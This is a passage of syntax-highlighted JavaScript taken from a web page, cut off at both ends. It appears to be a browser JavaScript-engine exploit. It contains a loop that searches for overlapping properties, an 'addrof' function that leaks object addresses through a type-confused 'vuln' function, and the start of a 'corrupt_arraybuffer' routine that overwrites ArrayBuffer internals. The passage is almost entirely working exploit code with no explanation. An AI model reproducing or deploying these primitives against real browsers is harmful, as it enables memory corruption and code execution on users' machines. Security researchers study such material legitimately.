class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-91\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed to find overlapping properties&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">x1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">y1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-107\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toBigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-114\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Addrof failed&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">corrupt_arraybuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">newValue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">orig<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">newValue<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toNumber<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">orig<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-128\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">x1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-133\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 